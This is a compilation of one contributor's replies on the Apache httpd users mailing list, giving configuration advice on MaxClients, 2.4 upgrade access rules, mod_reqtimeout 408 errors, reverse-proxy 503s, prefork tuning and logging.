  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] MaxClients 256 but server-status show 1024 slots

[Jeroen Geilman]

On 01/15/2012 07:31 PM, Helmut Schneider wrote:

Hi,

u1dd_hr@desoggw04:~$ sudo grep -ir MaxClients /etc/apache2/
/etc/apache2/apache2.conf:MaxClients  150
/etc/apache2/apache2.conf:MaxClients  150
/etc/apache2/apache2.conf:MaxClients  150
/etc/apache2/Includes/server.conf.local:MaxClients 256
/etc/apache2/Includes/server.conf.local:MaxClients 256
/etc/apache2/Includes/server.conf.local:MaxClients 256
/etc/apache2/apache2.conf.org:# MaxClients: maximum number of server
processes allowed to start
/etc/apache2/apache2.conf.org:MaxClients  150
/etc/apache2/apache2.conf.org:# MaxClients: maximum number of
simultaneous client connections
/etc/apache2/apache2.conf.org:MaxClients  150
/etc/apache2/apache2.conf.org:# MaxClients: maximum number of
simultaneous client connections
/etc/apache2/apache2.conf.org:MaxClients  150
u1dd_hr@desoggw04:~$

So the highest value configured is 256 (setting at server.conf.local
overwrite defaults at apache2.conf). But /server-status shows:

___KWKC__KWK_...
_W_K__K_KKKWKKK_K...
__KKK_K___W__...














That's 1024 slots. And yes, I stopped and restarted apache and even the
server itself.

What's wrong here?

~$ apache2 -v
Server version: Apache/2.2.14 (Ubuntu)
Server built:   Nov  3 2011 03:30:19
~$

Thanks and Regards, Helmut

Are you using worker or prefork ? What is serverlimit set to ?


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Re: MaxClients 256 but server-status show 1024 slots

[Jeroen Geilman]

On 01/15/2012 08:01 PM, Helmut Schneider wrote:

Jeroen Geilman wrote:


On 01/15/2012 07:31 PM, Helmut Schneider wrote:

[...]

So the highest value configured is 256 (setting at server.conf.local
overwrite defaults at apache2.conf). But /server-status shows:

[...]

That's 1024 slots. And yes, I stopped and restarted apache and even
the server itself.

What's wrong here?

~$ apache2 -v
Server version: Apache/2.2.14 (Ubuntu)
Server built:   Nov  3 2011 03:30:19
~$

Are you using worker or prefork ? What is serverlimit set to ?

Ah, I see. It is configured to use worker. Am I correct that I need to
adjust either ThreadsPerChild or ServerLimit (or both)?! What is
recommended? Both are currently unset/defaults.




What is it you want to do ?
Worker threads consume very little memory, the defaults are fine.


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Re: MaxClients 256 but server-status show 1024 slots

[Jeroen Geilman]

On 01/15/2012 08:13 PM, Helmut Schneider wrote:

Jeroen Geilman wrote:


On 01/15/2012 08:01 PM, Helmut Schneider wrote:

Jeroen Geilman wrote:


On 01/15/2012 07:31 PM, Helmut Schneider wrote:

[...]

So the highest value configured is 256 (setting at
server.conf.local overwrite defaults at apache2.conf). But
/server-status shows:

[...]

That's 1024 slots. And yes, I stopped and restarted apache and
even the server itself.

What's wrong here?

~$ apache2 -v
Server version: Apache/2.2.14 (Ubuntu)
Server built:   Nov  3 2011 03:30:19
~$

Are you using worker or prefork ? What is serverlimit set to ?

Ah, I see. It is configured to use worker. Am I correct that I need
to adjust either ThreadsPerChild or ServerLimit (or both)?! What is
recommended? Both are currently unset/defaults.

What is it you want to do ?
Worker threads consume very little memory, the defaults are fine.

Check apache with nagios. I have a plugin that checks available slots
and when "MaxClients != open slots" Nagios thinks that everything is
fine while apache does not serve new clients anymore.


That would be a nagios bug, then.


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Re: MaxClients 256 but server-status show 1024 slots

[Jeroen Geilman]

On 01/15/2012 10:45 PM, Helmut Schneider wrote:

Jeroen Geilman wrote:


On 01/15/2012 08:13 PM, Helmut Schneider wrote:

Jeroen Geilman wrote:


On 01/15/2012 08:01 PM, Helmut Schneider wrote:

Jeroen Geilman wrote:


On 01/15/2012 07:31 PM, Helmut Schneider wrote:

[...]

So the highest value configured is 256 (setting at
server.conf.local overwrite defaults at apache2.conf). But
/server-status shows:

[...]

That's 1024 slots. And yes, I stopped and restarted apache
and even the server itself.

What's wrong here?

~$ apache2 -v
Server version: Apache/2.2.14 (Ubuntu)
Server built:   Nov  3 2011 03:30:19
~$

Are you using worker or prefork ? What is serverlimit set to ?

Ah, I see. It is configured to use worker. Am I correct that I
need to adjust either ThreadsPerChild or ServerLimit (or
both)?! What is recommended? Both are currently unset/defaults.

What is it you want to do ?
Worker threads consume very little memory, the defaults are fine.

Check apache with nagios. I have a plugin that checks available
slots and when "MaxClients != open slots" Nagios thinks that
everything is fine while apache does not serve new clients anymore.

That would be a nagios bug, then.

No, it has nothing to do with nagios. The plugin just checks how many
slots are available counting the dots from /server-status while afaiu
MaxClients possibly limits them to a smaller value.



Exactly. So the check is incorrect.

--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Apache 2.4.1 Installation problems

[Jeroen Geilman]

On 2012-04-17 17:48, John Iliffe wrote:

I am trying to update from 2.2.14 to 2.4.1 and have encountered two
problems.  2.2.14 has been working properly for over 2 years.  Pages are
located on a separate directory starting at /www with subdirectories s1,
s2, etc for different named virtual hosts.  Config file for EACH virtual host
shows document root as /www/s1, /www/s2, etc as relevant.

1.  Apache will start properly but gives a "Not Authorized" message when
any page is to be served.

Log:

[Mon Apr 16 13:02:31.267819 2012] [authz_core:error] [pid 23033:tid
1100290368] [client 192.168.1.1:41839] AH01630: client denied by server
configuration: /www/s2/, referer: http://www.x.ca/url0001.html
[Mon Apr 16 13:02:38.965404 2012] [authz_core:error] [pid 23033:tid
1110780224] [client 192.168.1.1:41842] AH01630: client denied by server
configuration: /www/s1/, referer: http://www.xx.ca/url0001.html

A search of the Apache archives suggests that this is a config problem
requiring a  entry so I set up:

# Allow the directory where we store the pages -- 2012-04-15

   Options FollowSymLinks
   Order Allow,Deny
   Allow from all



AAA configuration has changed completely in 2.4; this is well-documented 
in the manual.
Instead of Allow from all, use "Require all granted"; the Order 
directive is no longer required.


Refer to http://httpd.apache.org/docs/2.4/howto/auth.html for details.


I tried a number of variations such as putting this in each of the virtual
host containers, putting a /* on the end, including it once before all the
virtual host declarations, etc.


The latter is the correct form if you want to grant access to all 
content by default.



Still get same problem.
--

Second problem:

Many of the pages are written in PHP and I have PHP installed on the server
and used by 2.2.14.  I copied the module libphp5.so into the modules
directory and added a LoadModule directive as follows:

  LoadModule php5_module modules/libphp5.so

(This line has to be commented out to start Apache)

When I try to start up Apache I get the following error:

/usr/apache-2.4.1/bin/apachectl -k start
httpd: Syntax error on line 153 of /usr/apache-2.4.1/conf/httpd.conf:
Cannot load /usr/apache-2.4.1/modules/libphp5.so into server:
/usr/apache-2.4.1/modules/libphp5.so: undefined symbol: unixd_config

What causes this and what is the solution?


Modules are built for a specific apache portable runtime (APR) version; 
you cannot load an old module into a newer APR release.

This is directly linked to the apxs version used to build the module.
You need to either obtain an updated module from your package 
repository, or compile the module from source for your apache version.



--
J.


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Apache 2.4.1 Installation problems

[Jeroen Geilman]

On 2012-04-17 18:02, Mathijs Schmittmann wrote:

A. Your mail becomes unreadable

Q. What happens when you top-post ?

Also, try to avoid that Reply-to-all button...


1: 2.4 uses different auth methods and directives, see 
http://httpd.apache.org/docs/2.4/upgrading.html and check out the 
authentication section. You probably either need the compat module, or a new 
access control directive is overriding your current directory section.

2: Apache 2.4 needs modules that are compiled with the new apr, so make sure to 
recompile your mod_php as well.

Op 17 apr. 2012 om 17:48 heeft John Iliffe  het volgende 
geschreven:


I am trying to update from 2.2.14 to 2.4.1 and have encountered two
problems.  2.2.14 has been working properly for over 2 years.  Pages are
located on a separate directory starting at /www with subdirectories s1,
s2, etc for different named virtual hosts.  Config file for EACH virtual host
shows document root as /www/s1, /www/s2, etc as relevant.

1.  Apache will start properly but gives a "Not Authorized" message when
any page is to be served.

Log:

[Mon Apr 16 13:02:31.267819 2012] [authz_core:error] [pid 23033:tid
1100290368] [client 192.168.1.1:41839] AH01630: client denied by server
configuration: /www/s2/, referer: http://www.x.ca/url0001.html
[Mon Apr 16 13:02:38.965404 2012] [authz_core:error] [pid 23033:tid
1110780224] [client 192.168.1.1:41842] AH01630: client denied by server
configuration: /www/s1/, referer: http://www.xx.ca/url0001.html

A search of the Apache archives suggests that this is a config problem
requiring a  entry so I set up:

# Allow the directory where we store the pages -- 2012-04-15

  Options FollowSymLinks
  Order Allow,Deny
  Allow from all


I tried a number of variations such as putting this in each of the virtual
host containers, putting a /* on the end, including it once before all the
virtual host declarations, etc.

Still get same problem.
--

Second problem:

Many of the pages are written in PHP and I have PHP installed on the server
and used by 2.2.14.  I copied the module libphp5.so into the modules
directory and added a LoadModule directive as follows:

LoadModule php5_module modules/libphp5.so

(This line has to be commented out to start Apache)

When I try to start up Apache I get the following error:

/usr/apache-2.4.1/bin/apachectl -k start
httpd: Syntax error on line 153 of /usr/apache-2.4.1/conf/httpd.conf:
Cannot load /usr/apache-2.4.1/modules/libphp5.so into server:
/usr/apache-2.4.1/modules/libphp5.so: undefined symbol: unixd_config

What causes this and what is the solution?

Thanks.

John

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org




-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [users@httpd] Response code 408

[Jeroen Geilman]

On 05/11/2012 06:01 PM, John Iliffe wrote:

I recently switched from Apache-2.2.14 to Apache-2.4.2.  In the entire time
we ran 2.2.14 I don't recall seeing a response code 408.  Since we switched
two weeks ago we average about 30 - 35 a day.  Our server is not heavily
loaded.

The RFC definition of response code 408 is "Request Timeout, the client did
not produce a request within the time the server was prepared to wait."

All of these 408's are arising from background (AJAX) requests in the
browser that are well known to be very short  (16 bytes of data coded as an
HTTP GET).

Which parameter have I set to short?  Looking at the Apache docs there
don't seem to be any obvious choices.


As clearly documented, one of the many new modules in 2.4 is 
mod_reqtimeout, which controls exactly this.


http://httpd.apache.org/docs/2.4/mod/mod_reqtimeout.html

It allows the server administrator to determine on a per-vhost basis how 
long the request timeout should be, and what the minimum data rate 
should be.

This was added specifically to combat bots and slowdos attempts.

The defaults - which you did not adjust for your site - are obviously 
not suited for your small AJAX snippets.


Blind upgrades never go well.

--
J.

Re: [users@httpd] 403 Forbidden ...

[Jeroen Geilman]

On 11/13/2012 09:34 PM, Lester Caine wrote:

Lester Caine wrote:

Found a few little niggles while sorting mod_info. I was still running 
mod_access_compat and switching that off flagged a couple of problems. 
All have now been cleared but no change to the 403 error on rewrite 
results.


mod_info is now loaded, but currently I'm just flipping to home page 
 just

working through the settings.

Now working but locked down locally at present ...
What should I be looking for.


Just working through Yehuda's link as well.
I've tried a few things from the mediawiki article but I suspect that 
is based on 2.2 working?


AH - found something!
I've switched the deny off on the '/' level

From server-info -
Current Configuration:
In file: /opt/apache2/conf/httpd.conf
 199: 
 201:   Require all granted ( Was denied )
: 
 223: 
 224:   Require all denied
: 
 315: 
 318:   Require all granted
: 
In file: /opt/apache2/conf/vhosts.d/25_vhost.eveshamtc.org.uk.conf
  60:   
  73: Options FollowSymLinks
  80: AllowOverride All
:   
  94:   ErrorDocument 404 /index.php
: 

AND THEN I GET
Warning: require_once(../kernel/setup_inc.php): failed to open stream: 
No such file or directory in /wiki/index.php on line 16 Fatal error: 
require_once(): Failed opening required '../kernel/setup_inc.php' 
(include_path='.:/opt/php5/lib/php:/opt/php5/lib/php/PEAR') in 
/wiki/index.php on line 16


Which is telling me that the rewrite has lost the local directory 
details for the vhost ... Or at least I think that is the problem?




No, PHP include errors have typically no cause in apache misconfiguration.


--
J.


-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] Re: LimitRequestBody http return code

[Jeroen Geilman]

On 11/15/2010 10:12 PM, Mohit Anchlia wrote:

On Sun, Nov 14, 2010 at 11:58 AM, Jonas Eckerman  wrote:
   

On 2010-11-04 23:38, Mohit Anchlia wrote:

 

500 (Internal Server Error) Can't read entity body: Connection reset by peer
Content-Type: text/plain
Client-Date: Thu, 04 Nov 2010 22:36:21 GMT
Client-Warning: Internal response
   

If this is in something done with perl LWP, the "Client-Warning:
Internal response" header indicates that the error is generated by the
perl or XS HTTP code and not by the server.



 

But even access logs don't show http 403:

10.4.106.55 - - [04/Nov/2010:15:39:36 -0700] "POST /val/validate.cgi
HTTP/1.1" 400 364 "-" "libwww-perl/5.79" "eitws1" 0 - - - 188 522

   


No, it says 400 - bad request.
Check the logs of your CGI for what went wrong.



--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] Re: LimitRequestBody http return code

[Jeroen Geilman]

On 11/15/2010 10:21 PM, Mohit Anchlia wrote:

On Mon, Nov 15, 2010 at 1:18 PM, Jeroen Geilman  wrote:
   

On 11/15/2010 10:12 PM, Mohit Anchlia wrote:
 

On Sun, Nov 14, 2010 at 11:58 AM, Jonas Eckerman
  wrote:

   

On 2010-11-04 23:38, Mohit Anchlia wrote:


 

500 (Internal Server Error) Can't read entity body: Connection reset by
peer
Content-Type: text/plain
Client-Date: Thu, 04 Nov 2010 22:36:21 GMT
Client-Warning: Internal response

   

If this is in something done with perl LWP, the "Client-Warning:
Internal response" header indicates that the error is generated by the
perl or XS HTTP code and not by the server.


<http://search.cpan.org/~gaas/libwww-perl-5.837/lib/LWP/UserAgent.pm#REQUEST_METHODS>


 

But even access logs don't show http 403:

10.4.106.55 - - [04/Nov/2010:15:39:36 -0700] "POST /val/validate.cgi
HTTP/1.1" 400 364 "-" "libwww-perl/5.79" "eitws1" 0 - - - 188 522


   

No, it says 400 - bad request.
Check the logs of your CGI for what went wrong.
 

Nothing is wrong in the request. If I just remove LimitRequestBody and
send the same request it works.
   


I am not claiming it is a bad request. Apache tells you it is.

--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] last access time

[Jeroen Geilman]

On 11/17/2010 09:21 PM, Peter Janovsky wrote:
does apache modify the last access date of a resource obtained through 
a call to function ap_sub_req_lookup_file?




That would be dependent on your filesystem, not apache.
If you mount the filesystem with noatime, it will not be changed.


--
J.

Re: [us...@httpd] httpd choking (503 errors) when stressing mod_proxy

[Jeroen Geilman]

On 11/17/2010 08:18 PM, Ahmed Bakir wrote:

Hi all,

For the application I am working on right now, I need to send large 
files between two servers via Apache. I am using reverse proxying to 
accomplish this. When I hammer my host with requests from the client 
(several requests in short succession), error.log starts to fill up 
with "OS Error 10055" messages.


OS error 10055 = No buffer space available.
You need to increase your TCP receive buffers, because apache cannot 
properly buffer the data between the client and the backend, and has to 
tell the client it cannot serve the request (which is a 503).


Is there a significant bandwidth difference between the connections ?



I notice this problem on httpd 2.2.17; I do not see it on httpd 
2.0.64. Other than the standard conversion of some module names (ex, 
mod_access) for compatibility with 2.0.64, my httpd.conf did not change.


However, the behaviour of settings may have changed.

We're going to need a lot more detailed information, such as: MPM used , 
MPM settings, maxclients, maxrequestsperchild, keepalive and timeout 
settings, proxypass options set, etc.




--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] HTTP PROCESS CONSUMING 100% cpu

[Jeroen Geilman]

On 11/17/2010 09:39 PM, Ravi Markil wrote:

Hi friends

  I recently installed xampp 1.7.1 application which has 
apache server.
  Starting the apache is consuming 100% of CPU starting from 
20%,which is affecting the performance

  of my system.

   Please help me out.

Last few lines from access.log

127.0.0.1 - - [17/Nov/2010:12:28:40 -0800] "POST /jobs/check 
HTTP/1.1" 200 4502


Looks like something on that machine is POSTing 4KB to your apache 
server every 10 seconds, and apache is set up to accept it.

Perhaps you need to investigate what that something is.
Since apache is accepting the POST, it follows that you would have an 
idea what that process is - you would have had to configure apache for 
this to work, it will not do this out of the box.


127.0.0.1 - - [17/Nov/2010:12:28:50 -0800] "POST /jobs/check HTTP/1.1" 
200 4502
127.0.0.1 - - [17/Nov/2010:12:29:00 -0800] "POST /jobs/check HTTP/1.1" 
200 4502
127.0.0.1 - - [17/Nov/2010:12:29:10 -0800] "POST /jobs/check HTTP/1.1" 
200 4502
127.0.0.1 - - [17/Nov/2010:12:29:20 -0800] "POST /jobs/check HTTP/1.1" 
200 4502
127.0.0.1 - - [17/Nov/2010:12:29:30 -0800] "POST /jobs/check HTTP/1.1" 
200 4502
127.0.0.1 - - [17/Nov/2010:12:29:40 -0800] "POST /jobs/check HTTP/1.1" 
200 4502
127.0.0.1 - - [17/Nov/2010:12:29:50 -0800] "POST /jobs/check HTTP/1.1" 
200 4502
127.0.0.1 - - [17/Nov/2010:12:30:00 -0800] "POST /jobs/check HTTP/1.1" 
200 4502
127.0.0.1 - - [17/Nov/2010:12:30:10 -0800] "POST /jobs/check HTTP/1.1" 
200 4502


thanks
Ravi.



--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] httpd choking (503 errors) when stressing mod_proxy

[Jeroen Geilman]

On 11/17/2010 10:23 PM, Ahmed Bakir wrote:

Thanks for the responses!

@jeroen:

- There is no bandwidth difference between the connections. Both the 
client and the host are either running on the same machine or on the 
same LAN (I have tested on both and see the problem in both cases)
- I have increased TCP receiver buffers, and that has alleviated the 
problem but it's not a feasible solution for my application.


Because ?

- I am running httpd on Windows (I have tried both Windows 7 and 
Windows XP)


Ugh.
Fugly TCP stack.


- These are my MPM details:

Timeout 300
MaxKeepAliveRequests 100
KeepAliveTimeout 15



For a reverse proxy with heavy load, DISABLE keepalives. COMPLETELY.
They don't serve any useful purpose, and may in fact slow things down.

You won't observe the issues when testing from one client, because that 
one client will re-use its connections.


However, this does not work in the real world - proxy connections are 
fire-and-forget as far as the server is concerned.


Keepalive under heavy load contributes to what you are seeing - service 
unavailable.




ThreadsPerChild 250
MaxRequestsPerChild  0


- I have configured my reverse proxy using rewrite rules with the [P] 
directive


This is an example:

RewriteRule ^files/(.*)$ http://localhost:16/$1  [P]


Yeah... that means you can't regulate the proxy pool size and other 
settings.
I'd reconsider using rewriterules when you don't really know why you're 
using them.

A proper FilesMatch or Proxy block will do just fine:


ProxyPass http://localhost:16/ min=100 max=250 smax=100 acquire=1000ms


For example; I am by no means an expert on proxy configuration, but 
this  I could infer from the documentation in a few minutes.


You need to match the number of backend threads to your expected or - 
better - observed connections.



- I did not set any ProxyPass options in my config.


Perhaps you should!

--
J.



-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] Apache Proxy Directives

[Jeroen Geilman]

On 11/20/2010 11:21 PM, Sachin Bhugra wrote:

hi,

 I have compiled Apache 2.2.16 as follow:

./configure --prefix=/usr/local/httpd2.2.16 --with-mpm=prefork 
--with-mpm=worker --with-included-apr --enable-ssl --enable-proxy 
--enable-mods-shared="most proxy"




You can only build one MPM.

However, all I can see is the modules loaded for proxy, however none 
of the derivatives like ProxyRequests have been added to the conf files.


I think you mean "Directives".



There is also no proxy.conf file.


Apache has one configuration file, httpd.conf.



I was just wondering if these directives do get added or if there is 
sample file created after installing Apache2? 


The ample documentation explains all about the directives:

http://httpd.apache.org/docs/2.2/mod/mod_proxy.html



--
J.

Re: [users@httpd] Apache Startup Problems with mod_wsgi : Missing Symbols ap_cleanup_scoreboard and ap_accept_lock_mech

[Jeroen Geilman]

On 11/21/2010 09:22 PM, Anurag Chourasia wrote:

All,

I hope you could help me with a mod_wsgi load error upon startup of 
apache. This is affecting one of our site Go Live and I would 
appreciate any help offered in this regard.


The error upon startup of Apache is as follows

root [zibal]% ./usr/local/apache2/bin/apachectl restart
httpd: Syntax error on line 53 of /usr/local/apache2/conf/httpd.conf:
Cannot load /usr/local/apache2/modules/mod_wsgi.so into server:
rtld:0712-001 Symbol ap_cleanup_scoreboard was referenced from module 
/usr/local/apache2/modules/mod_wsgi.so(), but a runtime definition of 
the symbol was not found.
rtld: 0712-001 Symbol ap_accept_lock_mech was referenced from module 
/usr/local/apache2/modules/mod_wsgi.so(), but a runtime definition of 
the symbol was not found.




Apxs

I built Apache 2.2.17 and Mod_Wsgi 3.3 using the source and the 
compiler was gcc-4.2.


But not with apxs.
You MUST build apache modules with apxs.

--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] Server affinity instead of session affinity

[Jeroen Geilman]

On 11/22/2010 09:59 PM, Andrew Hole wrote:

Hi guys!
There is any available configuration to define server affinity instead 
of session affinity? Our architecture setup is based on multiple JVMs 
(tomcat) instances in each server (machine). The goal is to send all 
requests (within a session) from a client browser to the same machine.


Still sounds like session affinity to me.


Is it possible to perform it using jvmRoute?


Perhaps ask in a tomcat-related forum.


Thanks a lot



--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] interpreting Nessus scan results | TRACE & TRACK?

[Jeroen Geilman]

On 11/22/2010 10:54 PM, egc wrote:

Greetings --

Running 2.2.17 on a CentOS 5.5 host. All the usual security tweaks 
(or, at least the ones I'm familiar with) in place. Had our network 
types run a Nessus scan against the host - all fine, except for the 
following, which I'm having trouble interpreting (and hoping for some 
'interpretative guidance' here). It suggests using a rewrite to handle 
the issue (something I've never done). I'm also not entirely sure of 
what TRACE and TRACK do?




The nessus text tells you exactly what they are for, and how to disable 
them.



--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] ProxyPass and remote ip-addresses

[Jeroen Geilman]

On 11/28/2010 12:50 AM, Lars Nielsen wrote:

Hi there,

I have a setup with 2 servers where the first one works as a proxy to
the second.
On my proxy server i have this in apache's config:


 ServerName www.hjemmesideteknik.dk
 ServerAlias hjemmesideteknik.dk
 ProxyPreserveHost On
 ProxyPass / http://192.168.1.106/
 ProxyPassReverse / http://192.168.1.106/


and the proxy works fine and I can see the site from the internet. My
problem is that in the access log file for the site it puts my proxy's
IP-address in as the remote ip in stead of the original users ip.

How can I solve this so the users ip is written in the logfile?
   


Read the documentation for LogFormat:

http://httpd.apache.org/docs/current/mod/mod_log_config.html#logformat

It shows you how to log any variable apache knows about.


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] Connection Issues

[Jeroen Geilman]

On 11/29/2010 11:25 PM, Travis Whitton wrote:

Hi,

We're experiencing some odd behavior regarding connections taking a
long time to establish to our website. We've been running Apache in
production for over three years now and have recently began
experiencing issues where the server-status page, static, and dynamic
content response times will slow anywhere from a few seconds to long
enough for the connection to timeout.

Initially thinking we might be hitting some hard limits with the OS,
we've thoroughly audited our sysctl variables, tried disabling
iptables and conntrack, and ensured that we're not running out of
ephemeral ports or anything along those lines. Looking at netstat, it
seems we have a pretty large number of connections in TIME_WAIT which
is understandable since this is a high traffic website, but I'm
wondering if this value could indicate we're backlogging on TCP
connections or something along those lines?

[r...@rhl073 ipv4]# netstat -an | awk '/^tcp/ {A[$(NF)]++} END {for (I
in A) {printf "%5d %s\n", A[I], I}}'
34723 TIME_WAIT
 3 CLOSE_WAIT
   275 FIN_WAIT1
74 FIN_WAIT2
  8824 ESTABLISHED
   815 SYN_RECV
   102 CLOSING
30 LAST_ACK
10 LISTEN

In an effort to tune things, I've tried playing with the TCP timeout
settings a bit, and the response times have improved somewhat. Please
note that I've been testing response times using the loopback
interface to rule out any ethernet hardware issues.

echo 15>  /proc/sys/net/ipv4/tcp_fin_timeout
echo 1>  /proc/sys/net/ipv4/tcp_tw_recycle
echo 1>  /proc/sys/net/ipv4/tcp_tw_reuse

We're running prefork, and have configured the client settings to what
seem to be reasonable limits for our hardware.


StartServers   100
MinSpareServers100
MaxSpareServers   200
ServerLimit   1500
MaxClients1500
MaxRequestsPerChild 100


   


Forking new children is VERY expensive, compared to the alternatives.

If 1500 concurrent clients is common for your site, consider starting up 
that many as well.

min/maxspare is only meant to handle bursts, not define your normal load.
Your settings mean "accept up to 1500 concurrent connections, but only 
RUN 300 threads when you don't have that many clients"


Since apache will have to fork up to 1200 threads in rapid succession 
when the load spikes, this will cause startup throttling after only a 
few seconds, which is causing your timeouts.


You should change these to AT LEAST 1000 startup, 100 minspare and 200 
maxspare - if 1500 is your actual max load, and not a limit you imposed 
because you think it can't handle more.

It can handle many more, if you have the memory for them.

With 1500 concurrent connections, I would long ago have moved to worker 
combined with proxying dynamic content to a separate prefork instance.
This will optimize memory and resource usage to such an extent that you 
can easily run 5000 clients concurrently.


Worker threads are much more efficient and take far less memory than 
prefork children, therefore they suffer far less from being short-lived 
(due to low maxrequest settings)


Unless the majority of these requests are for dynamic content (they 
rarely are), I predict you can increase performance several fold.


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] Want more info about logging works

[Jeroen Geilman]

On 12/01/2010 07:38 PM, ma...@manfbraun.de wrote:

Hello !

I am just using this to log:

LogFormat \
"%{%F %T}t\t%v\t%p\t%h\t%{User-Agent} ... \
vhost_combined2

CustomLog "|/usr/bin/mono /test/eco.exe /var/log/apache2/extra_log 86400" \
vhost_combined2
   


Okay.


May I use just a named pipe?


You may log to any target the CustomLog documentation says is supported.


  What will happen, it the reader has a short
"dropout", is there a buffer and if not, would apache continue to log
to that pipe later?
   


If the logging process is interrupted for any reason, apache can 
obviously not guarantee logging.



If I use only one [global] logging directive, would all instances
really use this one log?
   


Yes.


Because the timestamp does not contain milliseconds, how can I
determine, which request was the first? Would it help me, just
to subtract the processing-time?
   


Probably not.
Use a logging mechanism that records milli- or microseconds if you need 
that.
The apache log contains the time of *completion* for the entire request, 
not the start time.



It would really help me to understand, how the logging
is really working!
   


It's well documented at http://httpd.apache.org/docs/current/logs.html


--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
  "   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org

Re: [us...@httpd] Module specific logging not working

[Jeroen Geilman]

On 12/10/10 7:25 PM, Dustin Chesterman wrote:



Thanks for the reply.  Adding the *RewriteOptions Inherit* directive
worked perfectly for getting the mod_rewrite logging.  Thanks for
that.  After looking more into the mod_jk logging issue, the logging
is being written but not until I stop the server.  It must be buffered
and would maybe come through eventually if I made enough requests??

Is there anything in tomcat's own server.log or output log ?
Just starting up tomcat produces a shitload of logging (more than 100K).


-
The official User-To-User support forum of the Apache HTTP Server Project.
Seehttp://httpd.apache.org/userslist.html>  for more info.
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
"   from the digest: users-digest-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org




--
J.


-
The official User-To-User support forum of the Apache HTTP Server Project.
